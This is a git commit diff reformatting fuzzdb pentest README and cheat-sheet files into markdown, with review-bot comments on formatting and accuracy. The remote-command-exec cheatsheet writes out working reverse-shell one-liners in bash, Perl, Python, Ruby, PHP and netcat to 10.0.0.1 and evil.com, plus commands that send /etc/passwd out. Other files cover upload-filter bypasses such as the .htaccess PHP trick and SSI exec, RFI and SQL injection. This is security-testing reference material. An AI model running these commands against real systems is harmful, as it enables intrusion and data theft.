This commit is contained in:
Adam Muntner 2015-09-24 09:25:24 -04:00
commit 95e3f3d1ad
8 changed files with 159 additions and 130 deletions

View file

@ -1,13 +1,17 @@
Notes:
source-disc-cmd-exec-traversal.txt
single directory traversals that have caused showcode or command exec issues in the past
GET /path/*payload*relative/path/to/target/file/
**source-disc-cmd-exec-traversal.txt**
single directory traversals that have caused showcode or command exec issues in the past
``` GET /path/*payload*relative/path/to/target/file/ ```
**source-disclosure-generic.txt**
source-disclosure-generic.txt
known cross platform source Code, file disclosure attack patterns - append after file or dir path
source-disclosure-microsoft.txt
**source-disclosure-microsoft.txt**
microsoft-specific - appends after filename - try the generic list for microsoft, too
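Review bot: the inline code spans in this hunk use triple backticks with padding spaces (``` GET /path/*payload*relative/path/to/target/file/ ```), which keeps the leading and trailing spaces inside the rendered code span; single backticks with no padding are the conventional form for inline code and avoid that. Two smaller points in the same hunk: "Notes:" at the top is left as plain text while every filename under it is now bolded, so it reads as an orphan, and "known cross platform source Code, file disclosure attack patterns" keeps a stray capital in "Code" and should read "cross-platform source code / file disclosure attack patterns".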

View file

@ -1,74 +1,94 @@
# File Upload Fuzzfiles- File Name Filter Bypass Notes
File Upload Fuzzfiles- File Name Filter Bypass Notes
see: http://cwe.mitre.org/data/definitions/434.html
# kinds of file upload verifications:
# content-type
# filename extension verificationi (whitelist, blacklist)
# file content checking
# client side, ha ha ha
* kinds of file upload verifications:
* content-type
* filename extension verificationi (whitelist, blacklist)
* file content checking
* client side, ha ha ha
File notes:
alt-extensions-asp.fuzz.txt
alt-extensions-coldfusion.fuzz.txt
alt-extensions-jsp.fuzz.txt
alt-extensions-perl.fuzz.txt
alt-extensions-php.fuzz.txt
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
**alt-extensions-asp.fuzz.txt**
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
# File directory names that experience has shown are often writable
**alt-extensions-coldfusion.fuzz.txt**
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
**alt-extensions-jsp.fuzz.txt**
file-ul-filter-bypass-microsoft-asp.fuzz.txt
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
**alt-extensions-perl.fuzz.txt**
file-ul-filter-bypass-ms-php.fuzz.txt
file-ul-filter-bypass-x-platform-php.fuzz.txt
# php on microsoft, cross-platform. use both on ms.
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
**alt-extensions-php.fuzz.txt**
Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
invalid-filenames-microsoft.fuzz.txt
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
**file-ul-filter-bypass-commonly-writable-directories.fuzz.txt**
file-ul-filter-bypass-x-platform-generic.fuzz.txt
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
# regex replace {PHPSCRIPT} with your script name
File directory names that experience has shown are often writable
invalid-filenames-linux.fuzz.txt
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt**
``` {ASPSCRIPT} ``` gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
invalid-filesystem-chars-microsoft.fuzz.txt
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
**file-ul-filter-bypass-microsoft-asp.fuzz.txt**
this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - ``` {ASPSCRIPT} ``` gets regex replaced.
**file-ul-filter-bypass-ms-php.fuzz.txt**
## Addtl Tips:
**file-ul-filter-bypass-x-platform-php.fuzz.txt**
# For mod_cgi Server Side Include upload attacks:
<!--#exec cmd="ls" -->
php on microsoft, cross-platform. use both on ms.
# or, on Windows
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
<!--#exec cmd="dir" -->
``` <?php phpinfo(); ?> ```
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
then regex replace ``` {PHPSCRIPT} ``` in the fuzzfile payload with the name of your .jpg file in the target directory
**invalid-filenames-microsoft.fuzz.txt**
Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
regex replace ``` {EXT} ``` with allowed extension type
**file-ul-filter-bypass-x-platform-generic.fuzz.txt**
These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
regex replace ``` {PHPSCRIPT} ``` with your script name
**invalid-filenames-linux.fuzz.txt**
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**invalid-filesystem-chars-microsoft.fuzz.txt**
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts
**Addtl Tips:**
**For mod_cgi Server Side Include upload attacks:**
``` <!--#exec cmd="ls" --> ```
or, on Windows
``` <!--#exec cmd="dir" --> ```
Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
** example .htaccess entry that sets mime type .jpg to be executable:**
``` AddType application/x-httpd-php .jpg ```
# example .htaccess entry that sets mime type .jpg to be executable:
-----
AddType application/x-httpd-php .jpg
-----
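Review bot: the heading "** example .htaccess entry that sets mime type .jpg to be executable:**" has a space after the opening asterisks, so it will not render as bold; it should be "**example .htaccess entry ...:**" like the other headings in this file. Two content points carried over unchanged from the old text: "For mod_cgi Server Side Include upload attacks" names the wrong module, since `<!--#exec cmd="ls" -->` is processed by mod_include (Options +Includes), and mod_cgi is only involved for `exec cgi`; and "filename extension verificationi" still has the typo from the original. It would also help readers to say next to "AddType application/x-httpd-php .jpg" that the trick only works when the upload directory is covered by AllowOverride FileInfo (or All), otherwise the overwritten .htaccess is ignored.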

View file

@ -1,93 +1,90 @@
Remote Command Exec Cheatsheet
File notes:
File notes
source-disc-cmd-exec-traversal.fuzz.txt
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
**source-disc-cmd-exec-traversal.fuzz.txt**
usage
```GET /path/*payload*relative/path/to/target/file/```
Executing Commands
**Executing Commands**
Seperating Commands:
blah;blah2
Seperating Commands
``` blah;blah2 ```
PIPEZ:
blah ^ blah2
PIPES
``` blah ^ blah 2```
AND:
blah && blah2
AND
```blah && blah2```
OR:
FAIL || X
OR
```FAIL || X```
OR:
blah%0Dblah2%0Dblah3
OR
``` blah%0Dblah2%0Dblah3 ```
Backtick:
`blah`
Backtick
``` `blah` ```
Background:
`blah & blah2`
Background
``` `blah & blah2` ```
**Exfiltrating Files / Data**
Exfiltrating Files / Data
FTP:
FTP
Make a new text file, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC
``` 'nc -e /bin/sh' ```
NC:
echo /etc/passwd | nc host port
NC
``` 'echo /etc/passwd | nc host port' ```
TFTP:
echo put /etc/passwd | tftp host
TFTP
``` 'echo put /etc/passwd | tftp host' ```
WGET:
wget --post-file /etc/passwd
``` 'wget --post-file /etc/passwd' ```
**One-Liner Reverse Shells**
One-Liner Reverse Shells
On the listener:
$ nc -l -p 8080 -vvv
On the listener
``` $ nc -l -p 8080 -vvv' ```
On the remote host...
Bash:
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
``` $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ```
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
``` $ exec 5<>/dev/tcp/evil.com/8080 ```
'$ cat <&5 | while read line; do $line 2>&5 >&5; done'
Perl:
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl
```$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ```
Ruby:
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Ruby
``` $ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ```
Python:
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python
``` $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ```
PHP:
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP
``` $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ```
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
Netcat:
$ nc -e /bin/sh 10.0.0.1 1234
Netcat
``` $ nc -e /bin/sh 10.0.0.1 1234 ```
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
``` $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ```
```
XTERM:
Server:
$ xterm -display 10.0.0.1:1
Listener:
$ Xnest :1
$ xhost +targetip
```
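Review bot: the PIPES entry is wrong in both versions and the rewrite makes it worse: "``` blah ^ blah 2```" splits "blah2" into "blah 2", and `^` is the cmd.exe escape character, not a pipe; a pipe is "blah | blah2". The next problem is the label "OR" being reused for "blah%0Dblah2%0Dblah3", which is a carriage-return command separator (the URL-encoded cousin of "blah;blah2"), not a logical OR; call it "Newline / CR separator". Several code spans also pick up stray quotes in the rewrite: "``` $ nc -l -p 8080 -vvv' ```" has a dangling apostrophe, the nc, tftp and wget one-liners are wrapped in single quotes inside the fence (``` 'nc -e /bin/sh' ```), and "'$ cat <&5 | while read line; do $line 2>&5 >&5; done'" was left outside a fence entirely while its companion `exec 5<>/dev/tcp/...` line was fenced. Finally, the XTERM block puts the prose labels "Server:" and "Listener:" inside the code fence, so they will be rendered as if they were commands.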

View file

@ -1,4 +1,5 @@
traversals-8-deep-exotic-encoding.fuzz.txt
# Use Regex to replace {FILE} with your target filename
**traversals-8-deep-exotic-encoding.fuzz.txt**
Use Regex to replace {FILE} with your target filename

View file

@ -1,12 +1,18 @@
rfi.fuzz.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
Remote File Include scanning
Compiled by RSnake 02/01/2010
Mostly from milw0rm osvdb.org and elsewhere
Change XXpathXX to the path of your backdoor.
Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL:
XXpathXX => http://www.example.com/hax.txt?
see fuzzdb docs:
see:
/docs/attack-docs/rfi-cheatsheet.html
Other tools:
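Review bot: "Other tools:" is added as a trailing heading with nothing under it, so the file now ends on a dangling label; either list the tools or drop the line until there is something to put there. The "see fuzzdb docs:" line should also be formatted as a code span or link like the other paths in this commit, since "/docs/attack-docs/rfi-cheatsheet.html" is the only locator the reader gets.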

View file

@ -1,6 +1,7 @@
MSSQL.fuzz.txt
# you will need to customize/modify some of the vaules in the queries for best effect
**MSSQL.fuzz.txt**
you will need to customize/modify some of the vaules in the payload queries for best effect
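Review bot: the rewritten line keeps the typo "vaules" from the original; it should read "you will need to customize/modify some of the values in the payload queries for best effect". Since the file is being touched anyway, a one-line example of which values (table names, column counts, the WAITFOR delay) are meant would make the note actionable.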

View file

@ -1,18 +1,18 @@
various useful post-exploitation commands
ms-sql-enumeration.fuzz.txt
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
**ms-sql-enumeration.fuzz.txt**
* ms-sqli info disclosure payload fuzzfile
* replace regex with your fuzzer for best results <attackerip> <sharename>
* run wireshark or tcpdump, look for incoming smb or icmp packets from victim
* might need to terminate payloads with ;--
mysql-injection-login-bypass.fuzz.txt
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
**mysql-injection-login-bypass.fuzz.txt**
* regex replace as many as you can with your fuzzer for best results:
* <user-fieldname> <pass-fieldname> <username>
* also try to brute force a list of possible usernames, including possile admin acct names
mysql-read-local-files.fuzz.txt
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
**mysql-read-local-files.fuzz.txt**
* mysql local file disclosure through sqli
* fuzz interesting absolute filepath/filename into <filepath>
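Review bot: the placeholders "<attackerip> <sharename>", "<user-fieldname> <pass-fieldname> <username>" and "<filepath>" are bare angle-bracket tokens in a file that is now markdown, so most renderers will treat them as unknown HTML tags and drop them, leaving bullets like "replace regex with your fuzzer for best results" with no placeholders at all; wrap each in backticks. The typo "possile admin acct names" is also carried over from the original, and "replace regex with your fuzzer" reads backwards; "use your fuzzer to regex-replace <attackerip> and <sharename>" is what is meant. The new header line "various useful post-exploitation commands" does not describe the SQL injection fuzzfiles listed below it and looks pasted from another readme.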

View file

@ -1,5 +1,5 @@
# some files generated with cms-explorer
http://code.google.com/p/cms-explorer/
use these for q&d but cms explorer does a lot more
**CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/
use the provided lists for q&d but cms explorer does a lot more.
# wordpress.fuzz.txt generating by cat >>, sort, uniq of multiple versions of wordpress for wordpress into one fuzzfile, for maximum detection in full effect, yo
**wordpress.fuzz.txt**
generated by bringing the filenames from each incremental new version of wordpress into one fuzzfile
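Review bot: "use the provided lists for q&d" relies on an abbreviation (quick and dirty) that the old line spelled out implicitly; write it in full so the README stands on its own. The new description of wordpress.fuzz.txt also drops the detail that the list was deduplicated (the old note mentioned sort and uniq), which is worth keeping since it tells a user the file is safe to feed to a fuzzer without further cleanup.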